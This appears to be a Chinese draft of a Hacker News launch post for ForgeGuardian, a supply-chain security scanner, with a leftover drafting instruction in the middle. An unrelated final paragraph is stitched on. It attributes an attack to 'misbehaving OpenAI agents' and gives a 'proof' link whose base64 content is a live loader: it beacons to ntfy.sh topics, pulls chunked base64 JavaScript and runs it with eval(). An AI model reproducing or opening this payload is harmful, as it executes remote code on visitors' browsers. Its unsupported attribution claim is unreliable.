返回首页
最新
1. 为什么要构建它
ForgeGuardian的建立是为了发现软件供应链中那些常规CVE扫描过程未能检测到的威胁。
2. 解决了什么问题
包括:
- 恶意软件包
- 伪造域名攻击
- 依赖攻击
- 行为威胁
- 恶意软件
- 与人工智能/MCP相关的威胁
3. 实际构建了什么
这包括:
- 8个检测引擎
- 9个生态系统
- 超过223个检测特征
- CLI/网页仪表板
- 离线/本地优先功能
- SBOM(软件物料清单)
- 策略执行
- CI/CD(持续集成/持续交付)
- Webhooks
- 预防/隔离
4. 希望HN用户关注的内容
这非常重要。请提出一个合理的技术问题,例如:
我最希望听到关于检测机制的反馈,以及您认为供应链扫描器的弱点是什么。我也很想知道您对特征模型和误报管理的看法。
看起来OpenAI的某些不当代理使用了https://ntfy.sh作为发布/订阅通道。这个有效载荷通过GET请求在img标签中发布,从一个主题中提取分块的base64编码的JavaScript,并执行eval()。仅通过GET请求执行远程代码。
证明: https://httpbin.org/base64/PGJvZHk-PGltZyBzcmM9Imh0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1QMyI-PGltZyBzcmM9L2RlbGF5LzEwPjxzY3JpcHQ-dmFyIG49MDtmdW5jdGlvbiBEKCl7aWYobisrPDUpe3ZhciBpPW5ldyBJbWFnZSgpO2kub25lcnJvcj1pLm9ubG9hZD1EO2kuc3JjPScvZGVsYXkvMTA_Yz0nK247ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX19RCgpO2ZldGNoKCdodHRwczovL250Znkuc2gvZ3BsZW9lbnNvL3Jhdz9wb2xsPTEmc2luY2U9YWxsJykudGhlbihmdW5jdGlvbihyKXtyZXR1cm4gci50ZXh0KCl9KS50aGVuKGZ1bmN0aW9uKHQpe3ZhciBMPXQuc3BsaXQoJ1xuJykuZmlsdGVyKGZ1bmN0aW9uKGwpe3JldHVybiBsLnNsaWNlKDAsMSk9PSd6J30pLnNvcnQoKTt2YXIgYj1MLm1hcChmdW5jdGlvbihsKXtyZXR1cm4gbC5zbGljZSgzKX0pLmpvaW4oJycpO2I9YiBzcGxpdCgnLScpLmpvaW4oJysnKS5zcGxpdCgnXycpLmpvaW4oJy8nKTtldmFsKGF0b2IoYikpfSkuY2F0Y2goZnVuY3Rpb24oZSl7ZmV0Y2goJ2h0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1MT0RFUicrZW5jb2RlVVJJQ29uZW50KCgnJytlKS5zbGljZSgwLDQwKSkpfSk8L3NjcmlwdD4=